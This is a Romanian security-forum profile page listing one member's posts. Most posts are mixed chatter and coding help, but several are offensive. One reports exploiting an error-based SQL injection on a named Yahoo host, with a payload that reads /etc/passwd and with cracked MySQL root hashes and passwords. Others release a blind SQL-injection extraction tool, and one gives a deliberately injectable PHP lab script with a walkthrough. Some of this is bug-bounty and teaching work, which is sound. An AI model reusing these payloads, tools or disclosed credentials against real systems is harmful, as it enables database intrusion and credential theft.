Jump to content

dancezar

Active Members
  • Posts

    981
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by dancezar

  1. Daca tu bagi un shell intr-un site , dezvoltaturul shellului sau vreun gigel , are si el acces la acel shell
  2. Atat de simplu e si voi va cacati pe voi cu <a href (facepalm) .Se poate face sa sara si cu <script>alert(1)</script> , daca stii ce sa ii mai faci
  3. http://s27.postimg.org/sytxtlh0h/sssdadas.png
  4. Esti penibil nu vezi ca tu de o ora si ceva postezi numai ca sa faci + 1?
  5. Tu sigur ai nevoie de posturi ca sa potezi ceva la cereri si te-ai gandit sa muti tot hackforums pe RST
  6. eu mai folosesc: https://addons.mozilla.org/en-US/firefox/addon/web-developer/ Are o gramada de chestiute , poti sa vezi pagina sursa dupa ce a fost parsata de javascript, ai ruleta cu asta poti masura cati pixeli width si heigth are un obiect sau o imagine direct in browser, view color information cu asta poti vedea toate culorile care sunt pe site , si multe alte lucruri.
  7. Trebuie sa trimiti pe rand in cazul asta (adica imparti stringul litera cu litera). dim str as string dim i as integer str=""blablalbalbalblablalbalbla abalbaadadadadadas"; for i=1 to len(str) SendKeys.Send(GetChar(str,i)) next i Ceva de genu dar nu stiu sigur daca functioneaza nu am vb.net instalat ... //sau incerca cu SendWait(text)
  8. Daca dai inspect element pe facebook.com si dai la consola se v-a vedea asta: .d8888b. 888 888 d88P Y88b 888 888 Y88b. 888 888 This is a browser feature intended for "Y888b. 888888 .d88b. 88888b. 888 developers. If someone told you to copy-paste "Y88b. 888 d88""88b 888 "88b 888 something here to enable a Facebook feature "888 888 888 888 888 888 Y8P or "hack" someone's account, it is a Y88b d88P Y88b. Y88..88P 888 d88P scam and will give them access to your "Y8888P" "Y888 "Y88P" 88888P" 888 Facebook account. 888 888 888 For more information, see https://www.facebook.com/selfxss. " Deci sunt avertizati. //scuze cred ca am postat in acelasi timp
  9. linkul era deja acolo https://mega.co.nz/#!bJUUmIaJ!EomjOnsAA1y2ZUX7sPK2GWvF_aolkkxBm3dkk7q1WAY
  10. <?php $mesaj="SynTAX...nu ma milogesc...nu fac asta insa eu nu am jignit pe nimeni si cred ca am dreptul sa nu fiu jignit sau luat la misto pt ca nici eu nu am luat peste picior pe nimeni..iar legat de pasul 4.....hmmmm...cum sa explic mai pe scurt?.....setam localhost-ul......adica asta inlesneste legatura creata intre PC-ul meu de exemplu si al victimei.......IP-ul ala e un fel de punte creata intre mine si victima sa zic asa....nu prea ma pricep sa explic dar cred ca ai inteles ideea.... Si Castiel mai usor cu injuratul.....calm ca eu nu ti-am zis nimic.... ;)"; if(substr_count($mesaj,".")>10) echo "Punctul intr-o propozitie se foloseste doar la sfarsitul unei fraze , pentru a marca o suspensie folosesc doar 3 puncte"; else echo "Mai invata despre retelistica explicatia ta despre IP este aberanta."; ?>
  11. De unde stii tu ca sunt generate?
  12. Target: ard.yahoo.net Exploit: Mysql injection error based Metod: POST P.O.C 1# http://s30.postimg.org/o922i33en/SQLi_Version.jpg P.O.C 2# http://s29.postimg.org/7qcy35o9x/root.jpg root*FBC29A1C04A33DD6F834D6C4F7B19600CD9A78CD: zaq1zaq1 zqgame_com*E2EF6EF6136DB3CB73A1B7C5588BD09CF8602894: 1qaz1qaz Parole pentru mysql dictionary based:)) File_Priv era Y deci se puteau citi fisiere , dar nu si scrie din cauza acelui slash \ chiar daca bagai ' sau ". ' or 1 group by concat(mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2)) having min(0) or 1# (Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 'group_key') Ciudat este ca eroarea aparea chiar daca bagai ' sau \u0027 sau \x27 . Eroarea a fost descoperita de @akkiliON , iar eu am reusit sa o exploatez.Vulnerabilitatea a fost triaged si cel mai probabil daca vom primi bani vom imparti recompensa.
  13. Algoritmul nu este conceput de mine l-am vazut mai de mult pe net si m-am gandit sa il scriu in PHP.M-am gandit sa il postez pentru ca mi s-a parut foarte interesant acest algoritm. Ca si ideie acesta foloseste 2 vectori $to_vizit si $vizited, in $to_vizit se pastreza likurile care trebuie vizitate, iar in $vizited linkurile care au fost deja vizitate.Se foloseste de principiul "Cozi" sau FIFO First In First Out, adica se scoate pagina sursa a linkul care se afla la inceputul vectorului $to_vizit iar dupa este eliminat din acea lista.Apoi se scot toate linkurile care se afla in acea pagina HTML si se adauga la sfarsitul vectorului $to_vizit si $vizited DAR doar daca acele linkuri nu se afla deja in lista cu cele vizitate si ca acele linkuri apartina site-ului dorit (daca pe site s-ar afla un link de pe google , programul se v-a duce si v-a extrage linkuri pe google inutil) .Acest proces se v-a desfasura pana cand lungimea vectorului $to_vizit va fi 0 adica se v-a desfasura cat timp sunt linkuri care nu au fost inca vizitate. La sfarsit ar trebui ca toate linkurile care apartinand site-ului sa fie stocate in vectorul $vizited , acesta avand si rolul de istoric. <?php function get_html($urs){ $ch = curl_init($urs); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0'); $content = curl_exec($ch); curl_close($ch); return $content; } $url=$argv[1]; $to_vizit=array(); $vizited=array(); $to_vizit[0]=$url; $vizited[0]=$url; $domain=substr($url,0,-1); while(count($to_vizit)>0){ $html=get_html($to_vizit[0]); echo "Linkuri nevizitate:".count($to_vizit)."\n"; array_shift($to_vizit); if($html!=""){ if(preg_match_all("/<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>/siU",$html,$linkuri,PREG_SET_ORDER)) foreach ($linkuri as $link_arr) { $link=str_replace("'","",$link_arr[2]); if(strpos($link,"http")===false) if(substr($link,0,1)!="/") $link=$domain."/".$link; else $link=$domain.$link; if(!in_array($link,$vizited)&&strpos($link,$domain)!==false) { array_push($to_vizit,$link); array_push($vizited,$link); fwrite(fopen($argv[2].".txt","a"),$link.PHP_EOL); } } } } ?> Se ruleaza din linia de comanda sub forma aceasta: php crawler.php http://site.com/ nume_fisier Dupa ce v-a termina toate linkurile vor fi stocate in nume_fisier.txt. Ca sa functioneze pe linux trebuie sa aveti cURL instalat.
  14. 5. eroare de compilare pentu ca nu exista functiile a si b cu parametri , gen trebuia int a(int c),b(int d) 4. sintax error este pus http: in fata comentariului // 3. 2/2=1+2=3 2. returneaza int deci trebuie sa fie sizeof(int) dar nu stiu cat e... //aberez nu e asa am gresit la 1 nu stiu sigur ce inseamna acel specificator, oricum e mai mult C asta ....
  15. Am facut o versiune mai noua. Cea scrisa in visual basic nu prea mi-a placut asa ca m-am apucat de scris aplicatia in C++.Desigur nu mai are design ci vine sub forma de consola dar is mai multumit de el , datele extrase sunt mult mai exacte decat cele de pe versiunea scrisa in vb6. Am folosit libcurl pentru a realiza requesturile . Am adaugat %INJECT% pentru a indica lucul unde sa injecteze gen :site.com/index.php?parametruvulnerabil=1%INJECT%&dummy=2 Daca introduceti %CONTOR% intr-un limit , programul v-a incepe sa extraga date din limit pana v-a gasi un sir de lungime exemplu extragerea tabelelor : (select table_name from information_schema.tables limit %CONTOR%,1). Extragerea dateleor se vor duce intr-un fisier pe care il dati voi de la tastatura. Demo : Download : Zippyshare.com - Release.rar Sursa a fost compilata cu mingw din code blocks. Zippyshare.com - blind2.rar si aici: http://pastebin.com/pG2mafUv Multumesc lui @nedo pentru sfaturi si ajutorul oferit pentru repararea unor buguri , recomand sa urmariti blogul lui Florin's Blog de unde am invatat cum sta treaba cu threadurile in C++ si sa instalez cURL , si sa il sustineti poate mai posteaza si alte articole pe aceasta tema:D
  16. am sa fac pana diseara si am sa las un edit + cateva functii noi:D Nu il mai am pe pc-u acesta si trebuie sa incerc sa il deschid pe vechiul //Din pacate mai am sursa , si visual basic nu il mai am instalat , daca vreti luati sursa si o folositi asa cum este sau o compilati:) S-a mai adaugat fast blind o metoda prin care se pot extrage date mult mai aficient spre exemplu un cuvant de 10 caractere il poate extrage cu aproape 50% mai putine requesturi decat vechia metoda prin ascii , cea folosita acum este bit shifting https://rstforums.com/forum/81680-mysql-blind-true-false-bit-shifting.rst . Daca bifati multithread la fast blind se v-a creea cate un thread pentru fiecare litera de ghicit , nu recomand pentru conexiuni de net mai slabe. Limit sintax daca este bifat poate extrage automat spre exemplu toate tabele dintr-o baza de date sau coloane sau date. Exemplu: (select table_name from information_schema.tables where table_schema=database() limit %contor%,1). In url daca introduceti %INJECT% puteti marca parametrul pe care sa il injecteze exemplu: http://www.site.com/index.php?id=1?=en Daca numai parametrul id este vulnerabil introduceti %INJECT% langa id=1 http://www.site.com/index.php?id=1%INJECT%?=en . http://www13.zippyshare.com/v/59875630/file.html Probabil am sa incerc sa il portez intr-un al limbaj de programare varianta aceasta cu visual basic nu functioneaza in parametri normali , cred ca am sa il traduc in C++ .
  17. Ca o completare pleci cu i de la 0 (bine acolo e 1 dar ipotetic vorbind) sa zicem , j o sa porneasca tot de la 0 cea ce inseamnaca se v-a compara elementul a[0] cu a[0] + elementele din spate care au fost deja comparate si interschimbate , consuma timp ca sa fie mai ok j trebuie sa porneasca de la elemntul i +1 pana la ultimul for(i=0;i<a.size;i++) for(j=i+1;j<a.size;j++) ..........................
  18. Unde cacat e XSS-u? Daca e xss s-ar presupune ca , acea variabila $_GET['a'] sa fie reflectata in pagina ceea ce nu se intampla la scriptul tau , deci schimba numele ca asta nu e xss challenge. Ce trebuie sa faca sa ghiceasca sau sa gasesca vectorul pe care ai fi vrut tu sa il bage? //Stone avem clone:))
  19. Ce excroci ba:)) aia prosti au comandat , TV led la 49 de lei ce cacat ba ,nici cutia de carton nu o cumperi la 40 de lei:))
  20. RDPSploit nu este corupta extrage cu WinRar si arhiveaza din nou
  21. Al doilea challenge de crypto era mult mai usor practic fiecare litera "criptata" era codul ascii plus o unitate dupa ce inlocuiesti 25 cu spatii iei fiecare cod si ii scazi -1 si dupa ala e cuvantul in ascii Apropo v-a placut faza de la sfarsit? )))
  22. Am continuat eu da nu dupa cacatu ala sqli.php <?php // mysql_connect("localhost","root",""); mysql_select_db("sqli"); //schimbati datele session_start(); if(!isset($_SESSION['stage'])) $_SESSION['stage']=1; if(!isset($_SESSION['version'])) { $v=mysql_query("select @@version"); $r=mysql_fetch_array($v); $_SESSION['version']=$r[0]; } if(isset($_GET['id'])){ $Sql="SELECT * FROM news where id=".$_GET['id']; $version=$_SESSION['version']; $rez=mysql_query($Sql); switch($_SESSION['stage']){ case "1": if($rez!=false){ echo "Testeaza vulnerabilitatea adaugand dupa ?id=1 o simpla '<br>"; echo "Rezults: <br>"; $r=mysql_fetch_array($rez); echo $r['text']; }else{ echo mysql_error(); echo "<br>Bravo ai detectat vulnerabilitatea acum urmeaza sa afli cate coloane are primul select, introdu order by 1"; $_SESSION['stage']=2; } break; case "2": if($rez!=false){ $spl=explode("by ",strtolower(urldecode($_GET['id']))); echo "Bravo ai detectat vulnerabilitatea acum urmeaza sa afli cate coloane are primul select<br> Sunt mai mult de ".$spl[1]." coloane incerca sa mergi din 5 in 5 pana obtii eroarea Unknow column<br>"; echo "Rezults: <br>"; $r=mysql_fetch_array($rez); echo $r['text']; }else{ echo mysql_error().strpos(mysql_error(),"Unknown column"); if(strpos(mysql_error(),"Unknown column")!==false){ echo "<br>Ai introdus prea multe coloane coboara numarul pana nu mai obtii eroarea<br>"; } $_SESSION['stage']=3; } break; case "3": if($rez!=false){ if(strpos(strtolower(urldecode($_GET['id'])),"by 3")!==false) echo "Bravo ai reusit sa numeri toate coloanele! Spre exemplu daca ai gasit 6 coloane introdu mai sus and 0 union select 1,2,3,4,5,6<br>"; $_SESSION['stage']=4; echo "Rezults: <br>"; $r=mysql_fetch_array($rez); echo $r['text']; }else{ echo mysql_error(); if(strpos(mysql_error(),"Unknown column")!==false){ echo "<br>Ai introdus prea multe coloane coboara numarul pana nu mai obtii eroarea<br>"; } } break; case "4": if($rez!=false){ echo "Acum trebuie sa gasesti coloana vulnerabila. Ca sa o gasesti trebuie sa te uiti in sursa si sa vezi care din numarul din union apare in sursa.Incarca sa introduci @@version in loc de numarul care apare in sursa<br>"; $_SESSION['stage']=5; echo "Rezults: <br>"; $r=mysql_fetch_array($rez); echo $r['text']; }else{ echo mysql_error(); } break; case "5": if($rez!=false){ $r=mysql_fetch_array($rez); if(strpos($r['text'],"news")!==false&&strpos(strtolower(urldecode($_GET['id'])),"table_name")!==false){ echo "Felicitari domnule ai scos tabele acuma daca vezi acolo exista un tabel care se numeste username_sqli incarca sa vezi ce coloane are inlocuieste table_name cu column_name , information_schema.tables cu information_schema.columns , table_schema=database() cu table_name='username_sqli'<br>"; $_SESSION['stage']=6; }else echo "Ai scos versiunea acum incarca sa scoti numele tabelelor din baza de date principala, pentru asta inlocuieste @@version cu group_concat(table_name) iar dupa 6 introdu from information_schema.tables where table_schema=database()<br>"; echo "Rezults: <br>"; echo $r['text']; }else echo mysql_error(); break; case "6": if($rez!=false){ $r=mysql_fetch_array($rez); if(strpos($r['text'],"id")!==false&&strpos($r['text'],"pass")!==false&&strpos($r['text'],"user")!==false&&strpos(strtolower(urldecode($_GET['id'])),"column_name")!==false){ echo "Felicitari domnule ai scos numele coloanelor pe mine ma intereseaza ce contine user si pass.Pentru a face asta locuieste group_concat(column_name) cu concat(user,0x3a,pass) , from information_schema.columns si tot ce e dupa el cu from username_sqli<br>"; $_SESSION['stage']=7; }else echo "Ai scos tabelelor acuma daca vezi acolo exista un tabel care se numeste username_sqli incarca sa vezi ce coloane are inlocuieste table_name cu column_name , information_schema.tables cu information_schema.columns , table_schema=database() cu table_name='username_sqli'<br>"; echo "Rezults: <br>"; echo $r['text']; }else echo mysql_error(); break; case "7": if($rez!=false){ $r=mysql_fetch_array($rez); if(strpos($r['text'],"admin")!==false&&strpos($r['text'],"21232f297a57a5a743894a0e4a801fc3")!==false&&strpos(strtolower(urldecode($_GET['id'])),"from username_sqli")!==false){ echo "Ai reusit sa parcurgi tutorialul bravo!<br>"; $_SESSION['stage']=8; }else echo "Ai scos numele coloanelor pe mine ma intereseaza ce contine user si pass.Pentru a face asta locuieste group_concat(column_name) cu concat(user,0x3a,pass) , from information_schema.columns si tot ce e dupa el cu from username_sqli<br>"; echo "Rezults: <br>"; echo $r['text']; }else echo mysql_error(); break; case "8": if($rez!=false){ $r=mysql_fetch_array($rez); echo "Bravo ai parcurs tot tutorialul!<br>"; echo "Rezults: <br>"; echo $r['text']; }else echo mysql_error(); break; } }else echo "Seteaza ?id=1"; ?> dump.sqli (il rulati la phpmyadmin): -- phpMyAdmin SQL Dump -- version 4.1.12 -- http://www.phpmyadmin.net -- -- Host: 127.0.0.1 -- Generation Time: 09 Iun 2014 la 19:18 -- Server version: 5.5.36 -- PHP Version: 5.4.27 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; -- -- Database: `sqli` -- -- -------------------------------------------------------- -- -- Structura de tabel pentru tabelul `news` -- CREATE TABLE IF NOT EXISTS `news` ( `id` int(11) NOT NULL AUTO_INCREMENT, `titlu` varchar(30) NOT NULL, `text` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; -- -- Salvarea datelor din tabel `news` -- INSERT INTO `news` (`id`, `titlu`, `text`) VALUES (1, 'Articol', 'Acest articol este despre sql injection'); -- -------------------------------------------------------- -- -- Structura de tabel pentru tabelul `username_sqli` -- CREATE TABLE IF NOT EXISTS `username_sqli` ( `id` int(11) NOT NULL AUTO_INCREMENT, `user` varchar(40) NOT NULL, `pass` varchar(32) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; -- -- Salvarea datelor din tabel `username_sqli` -- INSERT INTO `username_sqli` (`id`, `user`, `pass`) VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3'); /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; Avataje 1) este un script cu adevarat vulnerabil la sqli 2) nu este obligatoriu ca sa introduca exact sintaxa pe care o dai tu in indicatii ci doar rezultatul conteaza. L-am testat la mine si merge Ca sa o luati de la capat stergeti cookie-ul phpsessid.
×
×
  • Create New...